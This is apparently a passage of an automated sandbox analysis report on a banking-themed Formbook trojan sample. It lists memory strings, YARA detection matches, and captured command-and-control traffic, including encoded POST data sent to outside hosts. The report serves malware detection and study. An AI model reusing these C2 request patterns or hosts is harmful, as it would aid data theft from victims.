73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 22 3e e5 88 b7 e6 96 b0 3c 2f 61 3e e6 8c 89 e9 92 ae ef bc 8c e5 b9 b6 e4 bd bf e7 94 a8 e5 85 b6 e4 bb 96 e5 87 ad e6 8d ae e9 87 8d e8 af 95 e3 80 82 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 68 32 3e 48 54 54 50 20 e9 94 99 e8 af af 20 34 30 31 2e 31 20 2d 20 e6 9c aa e7 bb 8f e6 8e 88 e6 9d 83 ef bc 9a e8 ae bf e9 97 ae e7 94 b1 e4 ba 8e e5 87 ad e6 8d ae e6 97 a0 e6 95 88 e8 a2 ab e6 8b 92 e7 bb 9d e3 80 82 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 e4 bf a1 e6 81 af e6 9c 8d e5 8a a1 20 28 49 49 53 29 3c 2f 68 32 3e
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 21 Nov 2022 09:59:40 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; f
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 21 Nov 2022 09:59:42 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; f
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: cscript.exe, 0000000A.00000002.514784229.0000000004BF6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: cscript.exe, 0000000A.00000002.515404559.0000000006DD0000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.514899513.0000000004F1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.vodien.com/
      Source: cscript.exe, 0000000A.00000002.515404559.0000000006DD0000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.514899513.0000000004F1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.vodien.com/singapore-email-hosting.php
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.279501626.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: q3W1-4699.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: q3W1-4699.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: q3W1-4699.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: cscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: q3W1-4699.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: cscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: cscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: cscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: cscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: cscript.exe, 0000000A.00000003.457811640.0000000000849000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownHTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.multimediapages.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.multimediapages.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.multimediapages.com/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 2d 54 36 6e 49 3d 6d 63 4c 7a 7a 6c 6c 51 57 77 75 6a 4d 66 4c 6f 52 70 77 35 65 38 31 69 78 38 6d 58 62 51 5a 4c 73 6e 4b 42 38 44 67 6b 55 49 61 68 7a 49 4e 62 6e 6d 30 59 79 36 4e 37 54 33 76 33 72 6d 6a 76 4f 51 46 68 31 6d 33 6f 76 73 4f 62 52 57 69 70 78 6d 37 42 4a 65 6d 4c 79 44 61 4f 34 47 6a 5a 70 43 75 66 75 35 76 6e 6c 6f 37 78 30 70 79 2d 46 48 63 41 49 30 37 47 71 70 72 4a 54 36 4c 38 55 5f 45 6e 51 5f 28 48 66 38 64 59 50 71 62 30 78 31 7e 62 55 79 6f 4b 33 4e 37 6e 65 30 72 50 57 41 61 34 45 39 45 35 36 6c 7a 70 49 7a 55 4d 76 42 77 70 39 4e 63 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f-T6nI=mcLzzllQWwujMfLoRpw5e81ix8mXbQZLsnKB8DgkUIahzINbnm0Yy6N7T3v3rmjvOQFh1m3ovsObRWipxm7BJemLyDaO4GjZpCufu5vnlo7x0py-FHcAI07GqprJT6L8U_EnQ_(Hf8dYPqb0x1~bUyoK3N7ne0rPWAa4E9E56lzpIzUMvBwp9Nc.
      Source: unknownDNS traffic detected: queries for: www.notarpucarhr.com
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73eh9wGmaMy0jmQVwd4+wO+lCGFJf&j6=hfNT HTTP/1.1Host: www.notarpucarhr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61fgMLb8wiC572LGglGnkN+mkNWG&j6=hfNT HTTP/1.1Host: www.multimediapages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnXlyB2HME2hA2u33jFcxbHUjt&j6=hfNT HTTP/1.1Host: www.oaksinstitute.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /qmpa/?3f-T6nI=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQZn8CJHCh1MhyDPKi16ua84ged&j6=hfNT HTTP/1.1Host: www.thetrendsinfo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.373374321.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221121.exe PID: 60, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: cscript.exe PID: 2876, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.507596524.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.507392181.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.373374321.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.506554045.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
